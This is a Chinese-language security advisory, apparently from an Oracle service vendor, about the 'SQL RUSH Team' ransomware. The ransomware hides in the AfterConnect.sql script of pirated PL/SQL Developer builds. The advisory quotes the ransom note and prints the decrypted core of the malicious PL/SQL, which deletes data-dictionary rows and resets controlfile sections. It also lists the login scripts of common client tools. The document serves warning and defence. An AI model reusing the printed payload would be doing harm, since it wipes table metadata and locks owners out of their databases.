最近，很多用戶遭遇到數(shù)據(jù)庫的安全問題，我們在此提示所有Oracle數(shù)據(jù)庫用戶關(guān)注此問題。

[[176378]]

　　問題癥狀：

　　登錄數(shù)據(jù)庫時，提示數(shù)據(jù)庫被鎖死，黑客提示發(fā)送5個比特幣可以解鎖。

　　在數(shù)據(jù)庫的日志中，可能獲得的信息如下：

　　ORA-00604: error occurred at recursive SQL level 1

　　ORA-20315: 你的數(shù)據(jù)庫已被SQL RUSH Team鎖死 發(fā)送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數(shù)據(jù)庫

　　Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.

　　ORA-06512: at “XXX.DBMS_CORE_INTERNAL ", line 27

　　ORA-06512: at line 2

　　問題原因：

　　根據(jù)我們收集的信息分析，這個問題的原因是：

　　如果用戶從某些不明來源下載了PL/SQL Developer工具后(尤其是各種綠色版、破解版)，這個工具的安裝目錄存在一個腳本文件AfterConnect.sql，正常安裝這個腳本是空文件，但是被注入的文件，該腳本包含了一系列的JOB定義、存儲過程和觸發(fā)器定義。

　　受感染的AfterConnect.sql腳本開頭偽裝非常正常的代碼：

　　實質(zhì)內(nèi)容卻是加密的惡意代碼：

　　腳本代碼的核心部分解密后如下：

　　BEGIN

　　SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;

　　IF (DATE1>=1200) THEN

　　EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';

　　DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;

　　COMMIT;

　　EXECUTE IMMEDIATE 'alter system checkpoint';

　　SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);

　　FOR I IN 1..2046 LOOP

　　DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');

　　DBMS_SYSTEM.KSDWRT(2, '你的數(shù)據(jù)庫已被SQL RUSH Team鎖死 發(fā)送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數(shù)據(jù)庫 ');

　　END LOOP;

　　END IF;

　　END;

　　一旦使用這個工具訪問數(shù)據(jù)庫，相應(yīng)對象會被后臺自動注入數(shù)據(jù)庫，執(zhí)行觸發(fā)器阻止后續(xù)的用戶登錄，并通過任務(wù)Truncate數(shù)據(jù)庫表。

　　我們強烈建議用戶檢查數(shù)據(jù)庫工具的使用情況，避免使用來歷不明的工具產(chǎn)品。

　　我們強烈建議：采用正版軟件，規(guī)避未知風(fēng)險。

　　安全漏洞：

　　幾乎絕大多數(shù)客戶端工具，在訪問數(shù)據(jù)庫時，都可以通過腳本進行一定的功能定義，而這些腳本往往就是安全問題的漏洞之一，來歷不明的工具是數(shù)據(jù)庫管理大忌，以下列出了常見客戶端工具的腳本位置，需要引起注意：

　　SQL*Plus: glogin.sql / login.sql

　　TOAD : toad.ini

　　PLSQLdeveloper: login.sql / afterconnect.sql

　　處置建議：

　　如果您的數(shù)據(jù)庫已經(jīng)遭受攻擊和數(shù)據(jù)損失，可以緊急聯(lián)系云和恩墨的服務(wù)團隊，我們可以幫助您處理數(shù)據(jù)修復(fù)事宜。云和恩墨的ODU產(chǎn)品，可以在數(shù)據(jù)丟失后最大限度的恢復(fù)數(shù)據(jù)。

　　事件回顧：

　　2015年9月，XcodeGhost入侵蘋果iOS事件在業(yè)內(nèi)引起不小震動。事件起因為不知名黑客向iOS應(yīng)用開發(fā)工具Xcode植入惡意程序，通過網(wǎng)盤和論壇上傳播，被感染的App并以此劫持蘋果用戶相關(guān)信息。來自多個安全團隊數(shù)據(jù)顯示，病毒感染波及AppStore下載量最高的5000個App其中的76個，保守估計受影響用戶數(shù)超過一億。

　　2012年2月，中文版putty等SSH遠(yuǎn)程管理工具被曝出存在后門，該后門會自動竊取管理員所輸入的SSH用戶名與口令，并將其發(fā)送至指定服務(wù)器上。